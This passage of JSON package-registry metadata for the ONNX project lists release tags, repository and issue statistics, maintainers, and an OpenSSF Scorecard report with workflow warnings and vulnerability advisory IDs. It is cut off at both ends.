43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2025-10-27T18:39:38.049Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":18.980130609976378,"stargazers_count":0.5974711685424483,"forks_count":0.4446297068222871,"average":5.005557871335278},"purl":"pkg:spack/onnx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/spack/onnx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/spack/onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/spack/onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-25T16:00:29.826Z","issues_count":1002,"pull_requests_count":2088,"avg_time_to_close_issue":24651025.396024466,"avg_time_to_close_pull_request":3750894.192264574,"issues_closed_count":653,"pull_requests_closed_count":1784,"pull_request_authors_count":174,"issue_authors_count":605,"avg_comments_per_issue":2.6766467065868262,"avg_comments_per_pull_request":1.985632183908046,"merged_pull_requests_count":1448,"bot_issues_count":5,"bot_pull_requests_count":386,"past_year_issues_count":201,"past_year_pull_requests_count":1024,"past_year_avg_time_to_close_issue":1563078.0,"past_year_avg_time_to_close_pull_request":426840.47297297296,"past_year_issues_closed_count":79,"past_year_pull_requests_closed_count":814,"past_year_pull_request_authors_count":69,"past_year_issue_authors_count":120,"past_year_avg_comments_per_issue":1.5621890547263682,"past_year_avg_comments_per_pull_request":1.6904296875,"past_year_bot_issues_count":5,"past_year_bot_pull_requests_count":186,"past_year_merged_pull_requests_count":706,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":435,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"jcwchen","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"zhenhuaw-me","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"prasanthpul","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"houseroad","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"lutzroeder","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"linkerzhang","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"}],"active_maintainers":[{"login":"andife","count":332,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"take-cheeze","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/onnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/onnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/onnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/onnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/onnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/onnx/codemeta","maintainers":[{"uuid":"wdconinc","login":"wdconinc","name":null,"email":null,"url":"https://github.com/wdconinc","packages_count":165,"html_url":null,"role":null,"created_at":"2025-12-05T07:49:24.605Z","updated_at":"2025-12-05T07:49:24.605Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers/wdconinc/packages"}],"registry":{"name":"spack.io","url":"https://packages.spack.io","ecosystem":"spack","default":true,"packages_count":9208,"maintainers_count":989,"namespaces_count":0,"keywords_count":3801,"github":"spack","metadata":{"funded_packages_count":440},"icon_url":"https://github.com/spack.png","created_at":"2022-04-04T15:19:23.514Z","updated_at":"2026-06-10T05:19:56.194Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/namespaces"}},{"id":3894493,"name":"github.com/onnx/onnx","ecosystem":"go","description":"","homepage":null,"licenses":"apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":"github.com/onnx","versions_count":35,"first_release_published_at":"2018-01-26T02:25:37.000Z","latest_release_published_at":"2026-03-27T17:18:24.000Z","latest_release_number":"v1.21.0","last_synced_at":"2026-05-28T05:32:03.322Z","created_at":"2022-04-12T00:01:09.988Z","updated_at":"2026-05-28T05:32:03.322Z","registry_url":"https://pkg.go.dev/github.com/onnx/onnx","install_command":"go get github.com/onnx/onnx","documentation_url":"https://pkg.go.dev/github.com/onnx/onnx#section-documentation","metadata":{},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2025-10-27T15:22:48.000Z","size":44729,"stargazers_count":19779,"open_issues_count":283,"forks_count":3816,"subscribers_count":426,"default_branch":"main","last_synced_at":"2025-10-27T17:28:08.029Z","etag":null,"topics":["deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2025-10-27T15:22:58.000Z","dependencies_parsed_at":"2025-04-15T13:18:07.946Z","dependency_job_id":"18eecf52-5a7d-4c8a-88f2-d8c63852c71f","html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2783,"total_committers":358,"mean_commits":7.773743016759776,"dds":0.903701042040963,"last_synced_commit":"f615b26d564ca5d2e2a28af81f4b86a99a1865f1"},"previous_names":[],"tags_count":35,"template":false,"template_full_name":null,"purl":"pkg:github/onnx/onnx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/sbom","scorecard":{"id":245425,"data":{"date":"2025-08-16T10:32:36Z","repo":{"name":"github.com/onnx/onnx","commit":"3e8c39a7c90f06e3a5ea9561c72770649dcb1b4f"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":6.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: Dependabot: .github/dependabot.yml:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: untrusted code checkout '${{ github.event.pull_request.head.sha }}': .github/workflows/auto_update_doc.yml:25"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/auto_update_doc.yml:22","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:35","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:36","Info: jobLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:26","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:214","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:266","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:304","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:162","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/auto_update_doc.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/check_urls.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/clang_tidy_review.yml:16","Warn: topLevel 'checks' permission set to 'write': .github/workflows/clang_tidy_review_post.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:62","Info: topLevel 'contents' permission set to 'read': .github/workflows/dco_merge_group.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/pages.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/pixi_build.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/preview_source_dist_test.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_linux.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_mac.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_sdist.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_aarch64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_x86_64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/reuse.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/stale.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/weekly_modelzoo.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/win_no_exception_ci.yml:14"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Info: Possibly incomplete results: error parsing shell code: statements must be separated by \u0026, ; or a newline: .github/workflows/main.yml:131","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/copilot-setup-steps.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/copilot-setup-steps.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr_checks.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pr_checks.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:78","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:39","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:40","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:73","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:80","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:85","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:86","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:151","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:161","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:171","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:189","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:195","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:249","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:266","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:37","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:38","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/pr_checks.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:49","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:50","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:57","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:82","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:112","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:113","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:119","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:120","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:126","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:46","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:55","Info:  59 out of  61 GitHub-owned GitHubAction dependencies pinned","Info:  22 out of  27 third-party GitHubAction dependencies pinned","Info:   0 out of  49 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/create_release.yml:152"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"74 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-6rq9-53c3-f7vj","Warn: Project is vulnerable to: PYSEC-2023-38 / GHSA-ffxj-547x-5j7c","Warn: Project is vulnerable to: PYSEC-2025-10 / GHSA-h36j-8vv3-cj52","Warn: Project is vulnerable to: PYSEC-2024-223 / GHSA-h8wv-9h96-m4hr","Warn: Project is vulnerable to: PYSEC-2024-222 / GHSA-whh8-fjgc-qp73","Warn: Project is vulnerable to: GHSA-3c5c-7235-994j","Warn: Project is vulnerable to: GHSA-3f63-hfp8-52jq","Warn: Project is vulnerable to: PYSEC-2021-41 / GHSA-3wvg-mj6g-m9cv","Warn: Project is vulnerable to: PYSEC-2020-77 / GHSA-3xv8-3j54-hgrp","Warn: Project is vulnerable to: PYSEC-2020-80 / GHSA-43fq-w8qq-v88h","Warn: Project is vulnerable to: GHSA-44wm-f244-xhp3","Warn: Project is vulnerable to: GHSA-4fx9-vc88-q2xc","Warn: Project is vulnerable to: PYSEC-2021-35 / GHSA-57h3-9rgr-c24m","Warn: Project is vulnerable to: PYSEC-2020-172 / GHSA-5gm3-px64-rw72","Warn: Project is vulnerable to: PYSEC-2021-331 / GHSA-7534-mm45-c74v","Warn: Project is vulnerable to: PYSEC-2021-92 / GHSA-7r7m-5h27-29hp","Warn: Project is vulnerable to: PYSEC-2020-78 / GHSA-8843-m7mw-mxqm","Warn: Project is vulnerable to: PYSEC-2023-227 / GHSA-8ghj-p4vj-mr35","Warn: Project is vulnerable to: PYSEC-2014-87 / GHSA-8m9x-pxwq-j236","Warn: Project is vulnerable to: PYSEC-2022-10 / GHSA-8vj2-vxx3-667w","Warn: Project is vulnerable to: PYSEC-2021-36 / GHSA-8xjq-8fcg-g5hw","Warn: Project is vulnerable to: PYSEC-2016-6 / GHSA-8xjv-v9xq-m5h9","Warn: Project is vulnerable to: PYSEC-2021-42 / GHSA-95q3-8gr9-gm8w","Warn: Project is vulnerable to: PYSEC-2022-168 / GHSA-9j59-75qj-795w","Warn: Project is vulnerable to: PYSEC-2014-10 / GHSA-cfmr-38g9-f2h7","Warn: Project is vulnerable to: PYSEC-2020-76 / GHSA-cqhg-xjhh-p8hf","Warn: Project is vulnerable to: PYSEC-2021-40 / GHSA-f4w8-cv6p-x6r5","Warn: Project is vulnerable to: PYSEC-2021-69 / GHSA-f5g8-5qq7-938w","Warn: Project is vulnerable to: PYSEC-2021-139 / GHSA-g6rj-rv7j-xwp4","Warn: Project is vulnerable to: PYSEC-2015-16 / GHSA-h5rf-vgqx-wjv2","Warn: Project is vulnerable to: PYSEC-2016-5 / GHSA-hggx-3h72-49ww","Warn: Project is vulnerable to: PYSEC-2020-84 / GHSA-hj69-c76v-86wr","Warn: Project is vulnerable to: PYSEC-2016-7 / GHSA-hvr8-466p-75rh","Warn: Project is vulnerable to: PYSEC-2015-15 / GHSA-j6f7-g425-4gmx","Warn: Project is vulnerable to: GHSA-j7hp-h8jx-5ppr","Warn: Project is vulnerable to: PYSEC-2019-110 / GHSA-j7mj-748x-7p78","Warn: Project is vulnerable to: GHSA-jgpv-4h4c-xhw3","Warn: Project is vulnerable to: PYSEC-2022-42979 / GHSA-m2vv-5vj5-2hm7","Warn: Project is vulnerable to: PYSEC-2021-37 / GHSA-mvg9-xffr-p774","Warn: Project is vulnerable to: PYSEC-2020-83 / GHSA-p49h-hjvm-jg3h","Warn: Project is vulnerable to: PYSEC-2022-8 / GHSA-pw3c-h7wp-cvhx","Warn: Project is vulnerable to: PYSEC-2021-93 / GHSA-q5hq-fp76-qmrc","Warn: Project is vulnerable to: PYSEC-2020-82 / GHSA-r7rm-8j6h-r933","Warn: Project is vulnerable to: PYSEC-2014-23 / GHSA-r854-96gq-rfg3","Warn: Project is vulnerable to: PYSEC-2016-8 / GHSA-rwr3-c2q8-gm56","Warn: Project is vulnerable to: PYSEC-2020-81 / GHSA-vcqg-3p29-xw73","Warn: Project is vulnerable to: PYSEC-2020-79 / GHSA-vj42-xq3r-hr3r","Warn: Project is vulnerable to: PYSEC-2021-70 / GHSA-vqcj-wrf2-7v73","Warn: Project is vulnerable to: PYSEC-2016-9 / GHSA-w4vg-rf63-f3j3","Warn: Project is vulnerable to: PYSEC-2014-22 / GHSA-x895-2wrm-hvp7","Warn: Project is vulnerable to: PYSEC-2022-9 / 